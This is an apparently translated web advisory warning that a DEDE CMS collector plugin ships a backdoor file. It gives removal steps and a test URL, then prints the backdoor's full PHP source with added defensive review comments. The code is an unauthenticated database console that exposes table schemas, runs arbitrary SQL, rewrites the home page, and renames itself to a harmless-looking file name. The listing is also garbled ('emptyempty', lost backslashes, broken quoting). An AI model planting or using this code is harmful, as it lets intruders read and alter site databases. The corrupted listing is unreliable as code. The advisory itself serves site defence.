How to remove the backdoor officially left in the DEDE collector master

  • 2020-03-31 21:27:30
  • OfStack

How to remove the official backdoor: after installing the collector master, immediately delete the dedesql.query.php file in the include directory. If it has already been installed, the file may have been renamed to arc.sqlquery.class.php. Look for both names, because the listing below contains a rename action that turns the first name into the second. This file can be used to query the website database without login verification, and to update, delete and read data, and so on. You can also test whether your own site is affected; the method is:
http://<your-domain>/include/dedesql.query.php?dopost=viewinfo
If the file is still present on your site, opening the above URL brings up the backdoor interface.
To be honest, the best course is not to use a program that ships with a backdoor. One backdoor has been found, and who knows whether there will be more in the next so-called new version. The code of the backdoor file is as follows:
 
<?php 
// Bootstrap: loads the CMS's shared include file. Nothing in this listing
// checks a session, a login or an admin role before acting on the request;
// the surrounding article states the file works without login verification.
require_once(dirname(__FILE__)."/../include/common.inc.php"); 
// $dopost selects which action below runs. It is never assigned from the
// request in this file; presumably common.inc.php exposes request parameters
// as global variables -- confirm against that file.
// NOTE(review): `emptyempty` looks like an artifact of how the page rendered
// the listing rather than a real PHP function; the listing is not runnable as printed.
if(emptyempty($dopost)) 
{ 
$dopost = ""; 
} 
// Action "rename": renames this script from dedesql.query.php to
// arc.sqlquery.class.php, a name that resembles an ordinary CMS class file.
// Both paths are relative, so they resolve against the process's working directory.
// For defenders: when auditing a site, search for BOTH file names, and review
// web-server logs for requests to either name carrying a `dopost` parameter.
if($dopost=="rename") 
{ 
if(rename('dedesql.query.php','arc.sqlquery.class.php')){ 
echo " Success! "; 
}else{ 
echo " Failure! "; 
} 
// Stop here so none of the later actions run in the same request.
exit(); 
} 
// Action "viewinfo": prints the CREATE TABLE statement of one table, which
// discloses the database schema to whoever can reach this file.
if($dopost=="viewinfo") 
{ 
// $tablename is not assigned in this file; presumably it arrives from the
// request via common.inc.php -- confirm.
if(emptyempty($tablename)) 
{ 
echo " Table name not specified! "; 
} 
else 
{ 
// The table name is concatenated straight into the SQL text with no
// validation, quoting or allow-list visible here.
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename); 
$dsql->Execute('me'); 
// MYSQL_BOTH belongs to the legacy mysql extension (removed in PHP 7).
$row2 = $dsql->GetArray('me',MYSQL_BOTH); 
// Column 1 of the SHOW CREATE TABLE result row is the DDL text.
$ctinfo = $row2[1]; 
// Output is wrapped in <xmp> and not passed through any HTML escaping.
echo "<xmp>".trim($ctinfo)."</xmp>"; 
} 
exit(); 
} 
// Action "index": regenerates the site's static home page file.
// No login or permission check is visible before the file is written.
if($dopost=="index") 
{ 
require_once(DEDEINC.'/arc.partview.class.php'); 
$envs = $_sys_globals = array(); 
$envs['aid'] = 0; 
$pv = new PartView(); 
// Template name and output position are read from the homepageset table.
$row = $pv->dsql->GetOne('Select * From `#@__homepageset`'); 
$templet = str_replace("{style}",$cfg_df_style,$row['templet']); 
// The output path is this script's directory joined with the stored position;
// no check that the result stays inside the web root is visible here.
$homeFile = dirname(__FILE__).'/'.$row['position']; 
// Path-separator normalisation. NOTE(review): the "\" literal is not valid PHP
// as printed; the page appears to have dropped backslashes from the listing.
$homeFile = str_replace("//","/",str_replace("\","/",$homeFile)); 
// Opening with 'w' creates or truncates the target before anything is rendered;
// on failure the message echoes the full filesystem path.
$fp = fopen($homeFile,'w') or die(" Unable to update website home page to: $homeFile  location "); 
fclose($fp); 
$tpl = $cfg_basedir.$cfg_templets_dir.'/'.$templet; 
$pv->SetTemplet($tpl); 
$pv->SaveToHtml($homeFile); 
$pv->Close(); 
echo " Updated homepage successfully! "; 
exit(); 
} 
else if($dopost=="query") 
{ 
// Action "query": runs SQL text supplied in $sqlquery against the site database.
// $sqlquery and $querytype are not assigned in this file; presumably they come
// from the request via common.inc.php -- confirm.
// stripslashes() removes backslash escaping from the submitted text before use.
$sqlquery = trim(stripslashes($sqlquery)); 
// The only restriction is a two-pattern denylist (drop...table, drop...database).
// It is not an access control: every other statement type is passed through.
// eregi() is a legacy function that was removed in PHP 7.
if(eregi("drop(.*)table",$sqlquery) ||eregi("drop(.*)database",$sqlquery)) 
{ 
echo "<span style='font-size:10pt'> delete ' The data table ' or ' The database ' Is not allowed to be executed here. </span>"; 
exit(); 
} 
// Statements beginning with "select " are executed and their rows printed.
if(eregi("^select ",$sqlquery)) 
{ 
$dsql->SetQuery($sqlquery); 
$dsql->Execute(); 
if($dsql->GetTotalRow()<=0) 
{ 
echo " run SQL : {$sqlquery} , no return record! "; 
} 
else 
{ 
echo " run SQL : {$sqlquery} , a total of ".$dsql->GetTotalRow()." Bar record, maximum return 100 Article! "; 
} 
// Print at most 100 records; the cap limits display only, not what was queried.
$j = 0; 
while($row = $dsql->GetArray()) 
{ 
$j++; 
if($j>100) 
{ 
break; 
} 
echo "<hr size=1 width='100%'/>"; 
echo " Record: $j"; 
echo "<hr size=1 width='100%'/>"; 
// Column names and values are echoed without HTML escaping.
foreach($row as $k=>$v) 
{ 
echo "<font color='red'>{$k} : </font>{$v}<br/>rn"; 
} 
} 
exit(); 
} 
// Non-SELECT input. querytype 2 = several statements, otherwise one statement.
if($querytype==2) 
{ 
// NOTE(review): "r", "t" and "n" here look like escape sequences whose
// backslashes were lost when the page rendered the listing.
$sqlquery = str_replace("r","",$sqlquery); 
// split() is a legacy function that was removed in PHP 7.
$sqls = split(";[ t]{0,}n",$sqlquery); 
$nerrCode = "";$i=0; 
foreach($sqls as $q) 
{ 
$q = trim($q); 
if($q=="") 
{ 
continue; 
} 
// Each statement is executed as written; successes are counted and
// database error text is collected for display.
$dsql->ExecuteNoneQuery($q); 
$errCode = trim($dsql->GetError()); 
if($errCode=="") 
{ 
$i++; 
} 
else 
{ 
$nerrCode .= " Perform:  <font color='blue'>$q</font>  Error, error prompt: <font color='red'>".$errCode."</font><br>"; 
} 
} 
echo " Successful execution {$i} a SQL Statement! <br><br>"; 
// Raw database error messages are returned to the caller.
echo $nerrCode; 
} 
else 
{ 
// Single-statement mode: the success line is printed unconditionally,
// followed by whatever error text the database returned.
$dsql->ExecuteNoneQuery($sqlquery); 
$nerrCode = trim($dsql->GetError()); 
echo " Successful execution 1 a SQL Statement! <br><br>"; 
echo $nerrCode; 
} 
exit(); 
} 
// Action "view": renders the HTML front end ("SQL Command line tool") for the
// actions above. Both forms post back to this same URL (action="") with
// dopost set to 'viewinfo' or 'query', and show the response in an iframe.
// The buttons also set dopost to 'opimize', 'repair', 'opimizeAll' and
// 'repairAll'; no handler for those values appears in this listing.
// NOTE(review): the single-quoted echo below contains unescaped single quotes
// as printed, so the page has presumably dropped backslashes from the listing.
if($dopost=="view") 
{ 
;echo '<html> 
<head> 
<meta http-equiv='Content-Type' content='text/html; charset=gb2312'> 
<title>SQL Command line tool </title> 
<link href='img/base.css' rel='stylesheet' type='text/css'> 
</head> 
<body background='img/allbg.gif' leftmargin='8' topmargin='8'> 
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA"> 
<tr> 
<td height="19" background="img/tbg.gif"> 
<table width="96%" border="0" cellspacing="1" cellpadding="1"> 
<tr> 
<td width="24%"><strong>SQL Command runner: </strong></td> 
<td width="76%" align="right"> <b><a href="sys_data.php"><u> The data backup </u></a></b> 
| <b><a href="sys_data_revert.php"><strong><u> Data reduction </u></strong></a></b> 
</td> 
</tr> 
</table> 
</td> 
</tr> 
<tr> 
<td height="200" bgcolor="#FFFFFF" valign="top"> 
<table width="100%" border="0" cellspacing="4" cellpadding="2"> 
<form action="" method="post" name="infoform" target="stafrm"> 
<input type='hidden' name='dopost' value='viewinfo' /> 
<tr bgcolor="#F3FBEC"> 
<td width="15%" height="24" align="center"> Table information of the system: </td> 
<td> 
<table width="100%" border="0" cellspacing="0" cellpadding="0"> 
<tr> 
<td width="35%"> 
<select name="tablename" id="tablename" style="width:100%" size="6"> 
'; 
// Fills the <select> with every table returned by SHOW TABLES plus its row
// count, so simply loading this page discloses the table list and data volumes.
$dsql->SetQuery("Show Tables"); 
$dsql->Execute('t'); 
while($row = $dsql->GetArray('t',MYSQL_BOTH)) 
{ 
// One COUNT(*) query per table; the table name is concatenated into the SQL.
$dsql->SetQuery("Select count(*) From ".$row[0]); 
$dsql->Execute('n'); 
$row2 = $dsql->GetArray('n',MYSQL_BOTH); 
$dd = $row2[0]; 
// Table names are written into the markup without HTML escaping.
echo " <option value='".$row[0]."'>".$row[0]."(".$dd.")</option>rn"; 
} 
;echo ' </select> 
</td> 
<td width="2%"> </td> 
<td width="63%" valign="bottom"> 
<div style="float:left;margin-right:20px;"> 
<input type="Submit" name="Submit1" value=" Optimization selection table " class="coolbg np" onClick="this.form.dopost.value='opimize';" /> 
<br /> 
<input type="Submit" name="Submit2" value=" Repair selected table " class="coolbg np" onClick="this.form.dopost.value='repair';" style="margin-top:6px;" /> 
<br /> 
<input type="Submit" name="Submit3" value=" View table structure " class="coolbg np" onClick="this.form.dopost.value='viewinfo';" style="margin-top:6px;" /> 
</div> 
<div style="float:left"> 
<input type="Submit" name="Submit5" value=" Optimize all tables " class="coolbg np" onClick="this.form.dopost.value='opimizeAll';" /> 
<br /> 
<input type="Submit" name="Submit6" value=" Repair all tables " class="coolbg np" onClick="this.form.dopost.value='repairAll';" style="margin-top:6px;" /> 
</div> 
</td> 
</tr> 
</table></td> 
</tr> 
<tr> 
<td height="200" align="center"> Return message: </td> 
<td> 
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe> 
</td> 
</tr> 
</form> 
<form action="" method="post" name="form1" target="stafrm"> 
<input type='hidden' name='dopost' value='query'> 
<tr> 
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong> run SQL The command line:  
<input name="querytype" type="radio" class="np" value="0"> 
 Single line command (supports simple queries)  
<input name="querytype" type="radio" class="np" value="2" checked> 
 Multi-line command </strong></td> 
</tr> 
<tr> 
<td height="118" colspan="2"> 
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea> 
</td> 
</tr> 
<tr> 
<td height="53" align="center"> </td> 
<td> 
<input name="imageField" type="image" src="img/button_ok.gif" width="60" height="22" border="0" class='np' /> 
</td> 
</tr> 
</form> 
</table> 
</td> 
</tr> 
</table> 
</body> 
</html> 
';} 
?> 
